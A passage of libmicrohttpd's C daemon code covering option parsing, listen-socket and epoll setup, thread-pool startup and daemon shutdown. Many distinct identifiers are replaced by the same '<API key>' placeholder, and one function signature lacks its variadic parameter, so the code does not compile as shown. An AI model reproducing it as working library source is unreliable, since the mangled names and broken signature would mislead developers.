case <API key>:
if (MHD_YES != parse_options (daemon,
servaddr,
opt,
oa[i].ptr_value,
MHD_OPTION_END))
return MHD_NO;
break;
/* all options taking two pointers */
case <API key>:
case <API key>:
case <API key>:
case <API key>:
if (MHD_YES != parse_options (daemon,
servaddr,
opt,
(void *) oa[i].value,
oa[i].ptr_value,
MHD_OPTION_END))
return MHD_NO;
break;
/* options taking size_t-number followed by pointer */
case <API key>:
if (MHD_YES != parse_options (daemon,
servaddr,
opt,
(size_t) oa[i].value,
oa[i].ptr_value,
MHD_OPTION_END))
return MHD_NO;
break;
default:
return MHD_NO;
}
i++;
}
break;
case <API key>:
daemon->unescape_callback =
va_arg (ap, UnescapeCallback);
daemon-><API key> = va_arg (ap, void *);
break;
default:
#if HAVE_MESSAGES
if (((opt >= <API key>) &&
(opt <= <API key>)) || (opt == <API key>))
{
MHD_DLOG (daemon,
"MHD HTTPS option %d passed to MHD compiled without HTTPS support\n",
opt);
}
else
{
MHD_DLOG (daemon,
"Invalid option %d! (Did you terminate the list with MHD_OPTION_END?)\n",
opt);
}
#endif
return MHD_NO;
}
}
return MHD_YES;
}
/**
* Create a listen socket, if possible with SOCK_CLOEXEC flag set.
*
* @param daemon daemon for which we create the socket
* @param domain socket domain (i.e. PF_INET)
* @param type socket type (usually SOCK_STREAM)
* @param protocol desired protocol, 0 for default
*/
static MHD_socket
create_socket (struct MHD_Daemon *daemon,
int domain, int type, int protocol)
{
int ctype = type | SOCK_CLOEXEC;
MHD_socket fd;
/* use SOCK_STREAM rather than ai_socktype: some getaddrinfo
* implementations do not set ai_socktype, e.g. RHL6.2. */
fd = socket (domain, ctype, protocol);
if ( (MHD_INVALID_SOCKET == fd) && (EINVAL == MHD_socket_errno_) && (0 != SOCK_CLOEXEC) )
{
ctype = type;
fd = socket(domain, type, protocol);
}
if (MHD_INVALID_SOCKET == fd)
return MHD_INVALID_SOCKET;
if (type == ctype)
<API key> (daemon, fd);
return fd;
}
#if EPOLL_SUPPORT
/**
* Setup epoll() FD for the daemon and initialize it to listen
* on the listen FD.
*
* @param daemon daemon to initialize for epoll()
* @return #MHD_YES on success, #MHD_NO on failure
*/
static int
<API key> (struct MHD_Daemon *daemon)
{
struct epoll_event event;
daemon->epoll_fd = epoll_create1 (EPOLL_CLOEXEC);
if (-1 == daemon->epoll_fd)
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Call to epoll_create1 failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
if (0 == EPOLL_CLOEXEC)
<API key> (daemon,
daemon->epoll_fd);
if (MHD_INVALID_SOCKET == daemon->socket_fd)
return MHD_YES; /* non-listening daemon */
event.events = EPOLLIN;
event.data.ptr = daemon;
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_ADD,
daemon->socket_fd,
&event))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Call to epoll_ctl failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
if ( (MHD_INVALID_PIPE_ != daemon->wpipe[0]) &&
(<API key> == (daemon->options & <API key>)) )
{
event.events = EPOLLIN | EPOLLET;
event.data.ptr = NULL;
event.data.fd = daemon->wpipe[0];
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_ADD,
daemon->wpipe[0],
&event))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Call to epoll_ctl failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
}
daemon-><API key> = MHD_YES;
return MHD_YES;
}
#endif
/**
* Start a webserver on the given port.
*
* @param flags combination of `enum MHD_FLAG` values
* @param port port to bind to (in host byte order)
* @param apc callback to call to check which clients
* will be allowed to connect; you can pass NULL
* in which case connections from any IP will be
* accepted
* @param apc_cls extra argument to @a apc
* @param dh handler called for all requests (repeatedly)
* @param dh_cls extra argument to @a dh
* @param ap list of options (type-value pairs,
* terminated with #MHD_OPTION_END).
* @return NULL on error, handle to daemon on success
* @ingroup event
*/
struct MHD_Daemon *
MHD_start_daemon_va (unsigned int flags,
uint16_t port,
<API key> apc,
void *apc_cls,
<API key> dh, void *dh_cls,
va_list ap)
{
const int on = 1;
struct MHD_Daemon *daemon;
MHD_socket socket_fd;
struct sockaddr_in servaddr4;
#if HAVE_INET6
struct sockaddr_in6 servaddr6;
#endif
const struct sockaddr *servaddr = NULL;
socklen_t addrlen;
unsigned int i;
int res_thread_create;
int use_pipe;
#ifndef HAVE_INET6
if (0 != (flags & MHD_USE_IPv6))
return NULL;
#endif
#ifndef HAVE_POLL_H
if (0 != (flags & MHD_USE_POLL))
return NULL;
#endif
#if ! HTTPS_SUPPORT
if (0 != (flags & MHD_USE_SSL))
return NULL;
#endif
#ifndef TCP_FASTOPEN
if (0 != (flags & <API key>))
return NULL;
#endif
if (NULL == dh)
return NULL;
if (NULL == (daemon = (struct MHD_Daemon*) malloc (sizeof (struct MHD_Daemon))))
return NULL;
memset (daemon, 0, sizeof (struct MHD_Daemon));
#if EPOLL_SUPPORT
daemon->epoll_fd = -1;
#endif
/* try to open listen socket */
#if HTTPS_SUPPORT
if (0 != (flags & MHD_USE_SSL))
{
<API key> (&daemon->priority_cache,
"NORMAL",
NULL);
}
#endif
daemon->socket_fd = MHD_INVALID_SOCKET;
daemon-><API key> = 0;
daemon->options = (enum MHD_OPTION) flags;
daemon->port = port;
daemon->apc = apc;
daemon->apc_cls = apc_cls;
daemon->default_handler = dh;
daemon->default_handler_cls = dh_cls;
daemon->connections = 0;
daemon->connection_limit = <API key>;
daemon->pool_size = <API key>;
daemon->pool_increment = MHD_BUF_INC_SIZE;
daemon->unescape_callback = &unescape_wrapper;
daemon->connection_timeout = 0; /* no timeout */
daemon->wpipe[0] = MHD_INVALID_PIPE_;
daemon->wpipe[1] = MHD_INVALID_PIPE_;
#if HAVE_MESSAGES
daemon->custom_error_log = (MHD_LogCallback) &vfprintf;
daemon-><API key> = stderr;
#endif
#ifdef <API key>
use_pipe = (0 != (daemon->options & (<API key> | <API key>)));
#else
use_pipe = 1; /* yes, must use pipe to signal shutdown */
#endif
if (0 == (flags & (<API key> | <API key>)))
use_pipe = 0; /* useless if we are using 'external' select */
if ( (use_pipe) && (0 != MHD_pipe_ (daemon->wpipe)) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to create control pipe: %s\n",
MHD_strerror_ (errno));
#endif
free (daemon);
return NULL;
}
#ifndef WINDOWS
if ( (0 == (flags & MHD_USE_POLL)) &&
(1 == use_pipe) &&
(daemon->wpipe[0] >= FD_SETSIZE) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"file descriptor for control pipe exceeds maximum value\n");
#endif
if (0 != MHD_pipe_close_ (daemon->wpipe[0]))
MHD_PANIC ("close failed\n");
if (0 != MHD_pipe_close_ (daemon->wpipe[1]))
MHD_PANIC ("close failed\n");
free (daemon);
return NULL;
}
#endif
#ifdef DAUTH_SUPPORT
daemon-><API key> = 0;
daemon->digest_auth_random = NULL;
daemon->nonce_nc_size = 4; /* tiny */
#endif
#if HTTPS_SUPPORT
if (0 != (flags & MHD_USE_SSL))
{
daemon->cred_type = <API key>;
}
#endif
if (MHD_YES != parse_options_va (daemon, &servaddr, ap))
{
#if HTTPS_SUPPORT
if ( (0 != (flags & MHD_USE_SSL)) &&
(NULL != daemon->priority_cache) )
<API key> (daemon->priority_cache);
#endif
free (daemon);
return NULL;
}
#ifdef DAUTH_SUPPORT
if (daemon->nonce_nc_size > 0)
{
if ( ( (size_t) (daemon->nonce_nc_size * sizeof (struct MHD_NonceNc))) /
sizeof(struct MHD_NonceNc) != daemon->nonce_nc_size)
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Specified value for NC_SIZE too large\n");
#endif
#if HTTPS_SUPPORT
if (0 != (flags & MHD_USE_SSL))
<API key> (daemon->priority_cache);
#endif
free (daemon);
return NULL;
}
daemon->nnc = (struct MHD_NonceNc*) malloc (daemon->nonce_nc_size * sizeof (struct MHD_NonceNc));
if (NULL == daemon->nnc)
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to allocate memory for nonce-nc map: %s\n",
MHD_strerror_ (errno));
#endif
#if HTTPS_SUPPORT
if (0 != (flags & MHD_USE_SSL))
<API key> (daemon->priority_cache);
#endif
free (daemon);
return NULL;
}
}
if (MHD_YES != MHD_mutex_create_ (&daemon->nnc_lock))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"MHD failed to initialize nonce-nc mutex\n");
#endif
#if HTTPS_SUPPORT
if (0 != (flags & MHD_USE_SSL))
<API key> (daemon->priority_cache);
#endif
free (daemon->nnc);
free (daemon);
return NULL;
}
#endif
/* Thread pooling currently works only with internal select thread model */
if ( (0 == (flags & <API key>)) &&
(daemon->worker_pool_size > 0) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"MHD thread pooling only works with <API key>\n");
#endif
goto free_and_fail;
}
if ( (<API key> == (flags & <API key>)) &&
(0 != (flags & <API key>)) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Combining <API key> and <API key> is not supported.\n");
#endif
goto free_and_fail;
}
#ifdef __SYMBIAN32__
if (0 != (flags & (<API key> | <API key>)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Threaded operations are not supported on Symbian.\n");
#endif
goto free_and_fail;
}
#endif
if ( (MHD_INVALID_SOCKET == daemon->socket_fd) &&
(0 == (daemon->options & <API key>)) )
{
/* try to open listen socket */
if (0 != (flags & MHD_USE_IPv6))
socket_fd = create_socket (daemon,
PF_INET6, SOCK_STREAM, 0);
else
socket_fd = create_socket (daemon,
PF_INET, SOCK_STREAM, 0);
if (MHD_INVALID_SOCKET == socket_fd)
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Call to socket failed: %s\n",
<API key> ());
#endif
goto free_and_fail;
}
/* Apply the socket options according to <API key>. */
if (0 == daemon-><API key>)
{
/* No user requirement, use "traditional" default SO_REUSEADDR,
and do not fail if it doesn't work */
if (0 > setsockopt (socket_fd,
SOL_SOCKET,
SO_REUSEADDR,
#if WINDOWS
(const char*)&on, sizeof (on)))
#else
(void*)&on, sizeof (on)))
#endif
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"setsockopt failed: %s\n",
<API key> ());
#endif
}
}
else if (daemon-><API key> > 0)
{
/* User requested to allow reusing listening address:port.
* Use SO_REUSEADDR on Windows and SO_REUSEPORT on most platforms.
* Fail if SO_REUSEPORT does not exist or setsockopt fails.
*/
#ifdef _WIN32
/* SO_REUSEADDR on W32 has the same semantics
as SO_REUSEPORT on BSD/Linux */
if (0 > setsockopt (socket_fd,
SOL_SOCKET,
SO_REUSEADDR,
(const char*)&on, sizeof (on)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"setsockopt failed: %s\n",
<API key> ());
#endif
goto free_and_fail;
}
#else
#ifndef SO_REUSEPORT
#ifdef LINUX
/* Supported since Linux 3.9, but often not present (or commented out)
in the headers at this time; but 15 is reserved for this and
thus should be safe to use. */
#define SO_REUSEPORT 15
#endif
#endif
#ifdef SO_REUSEPORT
if (0 > setsockopt (socket_fd,
SOL_SOCKET,
SO_REUSEPORT,
(void*)&on, sizeof (on)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"setsockopt failed: %s\n",
<API key> ());
#endif
goto free_and_fail;
}
#else
/* we're supposed to allow address:port re-use, but
on this platform we cannot; fail hard */
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Cannot allow listening address reuse: SO_REUSEPORT not defined\n");
#endif
goto free_and_fail;
#endif
#endif
}
else /* if (daemon-><API key> < 0) */
{
/* User requested to disallow reusing listening address:port.
* Do nothing except for Windows where SO_EXCLUSIVEADDRUSE
* is used. Fail if it does not exist or setsockopt fails.
*/
#ifdef _WIN32
#ifdef SO_EXCLUSIVEADDRUSE
if (0 > setsockopt (socket_fd,
SOL_SOCKET,
SO_EXCLUSIVEADDRUSE,
(const char*)&on, sizeof (on)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"setsockopt failed: %s\n",
<API key> ());
#endif
goto free_and_fail;
}
#else /* SO_EXCLUSIVEADDRUSE not defined on W32? */
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Cannot disallow listening address reuse: SO_EXCLUSIVEADDRUSE not defined\n");
#endif
goto free_and_fail;
#endif
#endif /* _WIN32 */
}
/* check for user supplied sockaddr */
#if HAVE_INET6
if (0 != (flags & MHD_USE_IPv6))
addrlen = sizeof (struct sockaddr_in6);
else
#endif
addrlen = sizeof (struct sockaddr_in);
if (NULL == servaddr)
{
#if HAVE_INET6
if (0 != (flags & MHD_USE_IPv6))
{
memset (&servaddr6, 0, sizeof (struct sockaddr_in6));
servaddr6.sin6_family = AF_INET6;
servaddr6.sin6_port = htons (port);
#if <API key>
servaddr6.sin6_len = sizeof (struct sockaddr_in6);
#endif
servaddr = (struct sockaddr *) &servaddr6;
}
else
#endif
{
memset (&servaddr4, 0, sizeof (struct sockaddr_in));
servaddr4.sin_family = AF_INET;
servaddr4.sin_port = htons (port);
#if <API key>
servaddr4.sin_len = sizeof (struct sockaddr_in);
#endif
servaddr = (struct sockaddr *) &servaddr4;
}
}
daemon->socket_fd = socket_fd;
if (0 != (flags & MHD_USE_IPv6))
{
#ifdef IPPROTO_IPV6
#ifdef IPV6_V6ONLY
#ifndef WINDOWS
const int
#else
const char
#endif
on = (MHD_USE_DUAL_STACK != (flags & MHD_USE_DUAL_STACK));
if (0 > setsockopt (socket_fd,
IPPROTO_IPV6, IPV6_V6ONLY,
&on, sizeof (on)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"setsockopt failed: %s\n",
<API key> ());
#endif
}
#endif
#endif
}
if (-1 == bind (socket_fd, servaddr, addrlen))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to bind to port %u: %s\n",
(unsigned int) port,
<API key> ());
#endif
if (0 != MHD_socket_close_ (socket_fd))
MHD_PANIC ("close failed\n");
goto free_and_fail;
}
#ifdef TCP_FASTOPEN
if (0 != (flags & <API key>))
{
if (0 == daemon->fastopen_queue_size)
daemon->fastopen_queue_size = <API key>;
if (0 != setsockopt (socket_fd,
IPPROTO_TCP, TCP_FASTOPEN,
(const char*) &daemon->fastopen_queue_size,
sizeof (daemon->fastopen_queue_size)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"setsockopt failed: %s\n",
<API key> ());
#endif
}
}
#endif
#if EPOLL_SUPPORT
if (0 != (flags & <API key>))
{
int sk_flags = fcntl (socket_fd, F_GETFL);
if (0 != fcntl (socket_fd, F_SETFL, sk_flags | O_NONBLOCK))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to make listen socket non-blocking: %s\n",
<API key> ());
#endif
if (0 != MHD_socket_close_ (socket_fd))
MHD_PANIC ("close failed\n");
goto free_and_fail;
}
}
#endif
if (listen (socket_fd, 128) < 0) // Increased to 128 from 32 by Milan Straka.
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to listen for connections: %s\n",
<API key> ());
#endif
if (0 != MHD_socket_close_ (socket_fd))
MHD_PANIC ("close failed\n");
goto free_and_fail;
}
}
else
{
socket_fd = daemon->socket_fd;
}
#ifndef WINDOWS
if ( (socket_fd >= FD_SETSIZE) &&
(0 == (flags & (MHD_USE_POLL | <API key>)) ) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Socket descriptor larger than FD_SETSIZE: %d > %d\n",
socket_fd,
FD_SETSIZE);
#endif
if (0 != MHD_socket_close_ (socket_fd))
MHD_PANIC ("close failed\n");
goto free_and_fail;
}
#endif
#if EPOLL_SUPPORT
if ( (0 != (flags & <API key>)) &&
(0 == daemon->worker_pool_size) &&
(0 == (daemon->options & <API key>)) )
{
if (0 != (flags & <API key>))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Combining <API key> and <API key> is not supported.\n");
#endif
goto free_and_fail;
}
if (MHD_YES != <API key> (daemon))
goto free_and_fail;
}
#else
if (0 != (flags & <API key>))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"epoll is not supported on this platform by this build.\n");
#endif
goto free_and_fail;
}
#endif
if (MHD_YES != MHD_mutex_create_ (&daemon-><API key>))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"MHD failed to initialize IP connection limit mutex\n");
#endif
if ( (MHD_INVALID_SOCKET != socket_fd) &&
(0 != MHD_socket_close_ (socket_fd)) )
MHD_PANIC ("close failed\n");
goto free_and_fail;
}
if (MHD_YES != MHD_mutex_create_ (&daemon-><API key>))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"MHD failed to initialize IP connection limit mutex\n");
#endif
(void) MHD_mutex_destroy_ (&daemon-><API key>);
if ( (MHD_INVALID_SOCKET != socket_fd) &&
(0 != MHD_socket_close_ (socket_fd)) )
MHD_PANIC ("close failed\n");
goto free_and_fail;
}
#if HTTPS_SUPPORT
/* initialize HTTPS daemon certificate aspects & send / recv functions */
if ((0 != (flags & MHD_USE_SSL)) && (0 != MHD_TLS_init (daemon)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to initialize TLS support\n");
#endif
if ( (MHD_INVALID_SOCKET != socket_fd) &&
(0 != MHD_socket_close_ (socket_fd)) )
MHD_PANIC ("close failed\n");
(void) MHD_mutex_destroy_ (&daemon-><API key>);
(void) MHD_mutex_destroy_ (&daemon-><API key>);
goto free_and_fail;
}
#endif
if ( ( (0 != (flags & <API key>)) ||
( (0 != (flags & <API key>)) &&
(0 == daemon->worker_pool_size)) ) &&
(0 == (daemon->options & <API key>)) &&
(0 != (res_thread_create =
create_thread (&daemon->pid, daemon, &MHD_select_thread, daemon))))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to create listen thread: %s\n",
MHD_strerror_ (res_thread_create));
#endif
(void) MHD_mutex_destroy_ (&daemon-><API key>);
(void) MHD_mutex_destroy_ (&daemon-><API key>);
if ( (MHD_INVALID_SOCKET != socket_fd) &&
(0 != MHD_socket_close_ (socket_fd)) )
MHD_PANIC ("close failed\n");
goto free_and_fail;
}
if ( (daemon->worker_pool_size > 0) &&
(0 == (daemon->options & <API key>)) )
{
#if !defined(WINDOWS) || defined(CYGWIN)
int sk_flags;
#else
unsigned long sk_flags;
#endif
/* Coarse-grained count of connections per thread (note error
* due to integer division). Also keep track of how many
* connections are leftover after an equal split. */
unsigned int conns_per_thread = daemon->connection_limit
/ daemon->worker_pool_size;
unsigned int leftover_conns = daemon->connection_limit
% daemon->worker_pool_size;
i = 0; /* we need this in case fcntl or malloc fails */
/* Accept must be non-blocking. Multiple children may wake up
* to handle a new connection, but only one will win the race.
* The others must immediately return. */
#if !defined(WINDOWS) || defined(CYGWIN)
sk_flags = fcntl (socket_fd, F_GETFL);
if (sk_flags < 0)
goto thread_failed;
if (0 != fcntl (socket_fd, F_SETFL, sk_flags | O_NONBLOCK))
goto thread_failed;
#else
sk_flags = 1;
if (SOCKET_ERROR == ioctlsocket (socket_fd, FIONBIO, &sk_flags))
goto thread_failed;
#endif /* WINDOWS && !CYGWIN */
/* Allocate memory for pooled objects */
daemon->worker_pool = (struct MHD_Daemon*) malloc (sizeof (struct MHD_Daemon)
* daemon->worker_pool_size);
if (NULL == daemon->worker_pool)
goto thread_failed;
/* Start the workers in the pool */
for (i = 0; i < daemon->worker_pool_size; ++i)
{
/* Create copy of the Daemon object for each worker */
struct MHD_Daemon *d = &daemon->worker_pool[i];
memcpy (d, daemon, sizeof (struct MHD_Daemon));
/* Adjust pooling params for worker daemons; note that memcpy()
has already copied <API key> thread model into
the worker threads. */
d->master = daemon;
d->worker_pool_size = 0;
d->worker_pool = NULL;
if ( (<API key> == (flags & <API key>)) &&
(0 != MHD_pipe_ (d->wpipe)) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to create worker control pipe: %s\n",
<API key>() );
#endif
goto thread_failed;
}
#ifndef WINDOWS
if ( (0 == (flags & MHD_USE_POLL)) &&
(<API key> == (flags & <API key>)) &&
(d->wpipe[0] >= FD_SETSIZE) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"file descriptor for worker control pipe exceeds maximum value\n");
#endif
if (0 != MHD_pipe_close_ (d->wpipe[0]))
MHD_PANIC ("close failed\n");
if (0 != MHD_pipe_close_ (d->wpipe[1]))
MHD_PANIC ("close failed\n");
goto thread_failed;
}
#endif
/* Divide available connections evenly amongst the threads.
* Thread indexes in [0, leftover_conns) each get one of the
* leftover connections. */
d->connection_limit = conns_per_thread;
if (i < leftover_conns)
++d->connection_limit;
#if EPOLL_SUPPORT
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != <API key> (d)) )
goto thread_failed;
#endif
/* Must init cleanup connection mutex for each worker */
if (MHD_YES != MHD_mutex_create_ (&d-><API key>))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"MHD failed to initialize cleanup connection mutex for thread worker %d\n", i);
#endif
goto thread_failed;
}
/* Spawn the worker thread */
if (0 != (res_thread_create =
create_thread (&d->pid, daemon, &MHD_select_thread, d)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to create pool thread: %s\n",
MHD_strerror_ (res_thread_create));
#endif
/* Free memory for this worker; cleanup below handles
* all previously-created workers. */
(void) MHD_mutex_destroy_ (&d-><API key>);
goto thread_failed;
}
}
}
return daemon;
thread_failed:
/* If no worker threads created, then shut down normally. Calling
MHD_stop_daemon (as we do below) doesn't work here since it
assumes a 0-sized thread pool means we had been in the default
<API key> mode. */
if (0 == i)
{
if ( (MHD_INVALID_SOCKET != socket_fd) &&
(0 != MHD_socket_close_ (socket_fd)) )
MHD_PANIC ("close failed\n");
(void) MHD_mutex_destroy_ (&daemon-><API key>);
(void) MHD_mutex_destroy_ (&daemon-><API key>);
if (NULL != daemon->worker_pool)
free (daemon->worker_pool);
goto free_and_fail;
}
/* Shutdown worker threads we've already created. Pretend
as though we had fully initialized our daemon, but
with a smaller number of threads than had been
requested. */
daemon->worker_pool_size = i - 1;
MHD_stop_daemon (daemon);
return NULL;
free_and_fail:
/* clean up basic memory state in 'daemon' and return NULL to
indicate failure */
#if EPOLL_SUPPORT
if (-1 != daemon->epoll_fd)
close (daemon->epoll_fd);
#endif
#ifdef DAUTH_SUPPORT
free (daemon->nnc);
(void) MHD_mutex_destroy_ (&daemon->nnc_lock);
#endif
#if HTTPS_SUPPORT
if (0 != (flags & MHD_USE_SSL))
<API key> (daemon->priority_cache);
#endif
free (daemon);
return NULL;
}
/**
* Close the given connection, remove it from all of its
* DLLs and move it into the cleanup queue.
*
* @param pos connection to move to cleanup
*/
static void
close_connection (struct MHD_Connection *pos)
{
struct MHD_Daemon *daemon = pos->daemon;
<API key> (pos,
<API key>);
if (pos->connection_timeout == pos->daemon->connection_timeout)
XDLL_remove (daemon->normal_timeout_head,
daemon->normal_timeout_tail,
pos);
else
XDLL_remove (daemon->manual_timeout_head,
daemon->manual_timeout_tail,
pos);
DLL_remove (daemon->connections_head,
daemon->connections_tail,
pos);
pos->event_loop_info = <API key>;
DLL_insert (daemon->cleanup_head,
daemon->cleanup_tail,
pos);
}
/**
* Close all connections for the daemon; must only be called after
* all of the threads have been joined and there is no more concurrent
* activity on the connection lists.
*
* @param daemon daemon to close down
*/
static void
<API key> (struct MHD_Daemon *daemon)
{
struct MHD_Connection *pos;
/* first, make sure all threads are aware of shutdown; need to
traverse DLLs in peace... */
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to acquire cleanup mutex\n");
for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
shutdown (pos->socket_fd,
(pos->read_closed == MHD_YES) ? SHUT_WR : SHUT_RDWR);
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to release cleanup mutex\n");
/* now, collect threads from thread pool */
if (0 != (daemon->options & <API key>))
{
while (NULL != (pos = daemon->connections_head))
{
if (0 != MHD_join_thread_ (pos->pid))
MHD_PANIC ("Failed to join a thread\n");
pos->thread_joined = MHD_YES;
}
}
/* now that we're alone, move everyone to cleanup */
while (NULL != (pos = daemon->connections_head))
close_connection (pos);
<API key> (daemon);
}
#if EPOLL_SUPPORT
/**
* Shutdown epoll()-event loop by adding 'wpipe' to its event set.
*
* @param daemon daemon of which the epoll() instance must be signalled
*/
static void
epoll_shutdown (struct MHD_Daemon *daemon)
{
struct epoll_event event;
if (MHD_INVALID_PIPE_ == daemon->wpipe[1])
{
/* wpipe was required in this mode, how could this happen? */
MHD_PANIC ("Internal error\n");
}
event.events = EPOLLOUT;
event.data.ptr = NULL;
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_ADD,
daemon->wpipe[1],
&event))
MHD_PANIC ("Failed to add wpipe to epoll set to signal termination\n");
}
#endif
/**
* Shutdown an HTTP daemon.
*
* @param daemon daemon to stop
* @ingroup event
*/
void
MHD_stop_daemon (struct MHD_Daemon *daemon)
{
MHD_socket fd;
unsigned int i;
if (NULL == daemon)
return;
daemon->shutdown = MHD_YES;
fd = daemon->socket_fd;
daemon->socket_fd = MHD_INVALID_SOCKET;
/* Prepare workers for shutdown */
if (NULL != daemon->worker_pool)
{
/* <API key> disables thread pools, hence we need to check */
for (i = 0; i < daemon->worker_pool_size; ++i)
{
daemon->worker_pool[i].shutdown = MHD_YES;
daemon->worker_pool[i].socket_fd = MHD_INVALID_SOCKET;
#if EPOLL_SUPPORT
if ( (0 != (daemon->options & <API key>)) &&
(-1 != daemon->worker_pool[i].epoll_fd) &&
(MHD_INVALID_SOCKET == fd) )
epoll_shutdown (&daemon->worker_pool[i]);
#endif
}
}
if (MHD_INVALID_PIPE_ != daemon->wpipe[1])
{
if (1 != MHD_pipe_write_ (daemon->wpipe[1], "e", 1))
MHD_PANIC ("failed to signal shutdown via pipe");
}
#ifdef <API key>
else
{
/* fd might be MHD_INVALID_SOCKET here due to 'MHD_quiesce_daemon' */
if (MHD_INVALID_SOCKET != fd)
(void) shutdown (fd, SHUT_RDWR);
}
#endif
#if EPOLL_SUPPORT
if ( (0 != (daemon->options & <API key>)) &&
(-1 != daemon->epoll_fd) &&
(MHD_INVALID_SOCKET == fd) )
epoll_shutdown (daemon);
#endif
#if DEBUG_CLOSE
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"MHD listen socket shutdown\n");
#endif
#endif
/* Signal workers to stop and clean them up */
if (NULL != daemon->worker_pool)
{
/* <API key> disables thread pools, hence we need to check */
for (i = 0; i < daemon->worker_pool_size; ++i)
{
if (MHD_INVALID_PIPE_ != daemon->worker_pool[i].wpipe[1])
{
if (1 != MHD_pipe_write_ (daemon->worker_pool[i].wpipe[1], "e", 1))
MHD_PANIC ("failed to signal shutdown via pipe");
}
if (0 != MHD_join_thread_ (daemon->worker_pool[i].pid))
MHD_PANIC ("Failed to join a thread\n");
<API key> (&daemon->worker_pool[i]);
(void) MHD_mutex_destroy_ (&daemon->worker_pool[i].<API key>);
#if EPOLL_SUPPORT
if ( (-1 != daemon->worker_pool[i].epoll_fd) &&
(0 != MHD_socket_close_ (daemon->worker_pool[i].epoll_fd)) )
MHD_PANIC ("close failed\n");
#endif
if ( (<API key> == (daemon->options & <API key>)) )
{
if (MHD_INVALID_PIPE_ != daemon->worker_pool[i].wpipe[1])
{
if (0 != MHD_pipe_close_ (daemon->worker_pool[i].wpipe[0]))
MHD_PANIC ("close failed\n");
if (0 != MHD_pipe_close_ (daemon->worker_pool[i].wpipe[1]))
MHD_PANIC ("close failed\n");
}
}
}
free (daemon->worker_pool);
}
else
{
/* clean up master threads */
if ((0 != (daemon->options & <API key>)) ||
((0 != (daemon->options & <API key>))
&& (0 == daemon->worker_pool_size)))
{
if (0 != MHD_join_thread_ (daemon->pid))
{
MHD_PANIC ("Failed to join a thread\n");
}
}
}
<API key> (daemon);
if ( (MHD_INVALID_SOCKET != fd) &&
(0 != MHD_socket_close_ (fd)) )
MHD_PANIC ("close failed\n");
/* TLS clean up */
#if HTTPS_SUPPORT
if (MHD_YES == daemon->have_dhparams)
{
<API key> (daemon->https_mem_dhparams);
daemon->have_dhparams = MHD_NO;
}
if (0 != (daemon->options & MHD_USE_SSL))
{
<API key> (daemon->priority_cache);
if (daemon->x509_cred)
<API key> (daemon->x509_cred);
}
#endif
#if EPOLL_SUPPORT
if ( (0 != (daemon->options & <API key>)) &&
(-1 != daemon->epoll_fd) &&
(0 != MHD_socket_close_ (daemon->epoll_fd)) )
MHD_PANIC ("close failed\n");
#endif
#ifdef DAUTH_SUPPORT
free (daemon->nnc);
(void) MHD_mutex_destroy_ (&daemon->nnc_lock);
#endif
(void) MHD_mutex_destroy_ (&daemon-><API key>);
(void) MHD_mutex_destroy_ (&daemon-><API key>);
if (MHD_INVALID_PIPE_ != daemon->wpipe[1])
{
if (0 != MHD_pipe_close_ (daemon->wpipe[0]))
MHD_PANIC ("close failed\n");
if (0 != MHD_pipe_close_ (daemon->wpipe[1]))
MHD_PANIC ("close failed\n");
}
free (daemon);
}
/**
* Obtain information about the given daemon
* (not fully implemented!).
*
* @param daemon what daemon to get information about
* @param info_type what information is desired?
* @param ... depends on @a info_type
* @return NULL if this information is not available
* (or if the @a info_type is unknown)
* @ingroup specialized
*/
const union MHD_DaemonInfo *
MHD_get_daemon_info (struct MHD_Daemon *daemon,
enum MHD_DaemonInfoType info_type,
)
{
switch (info_type)
{
case <API key>:
return NULL; /* no longer supported */
case <API key>:
return NULL; /* no longer supported */
case <API key>:
return (const union MHD_DaemonInfo *) &daemon->socket_fd;
#if EPOLL_SUPPORT
case <API key>:
return (const union MHD_DaemonInfo *) &daemon->epoll_fd;
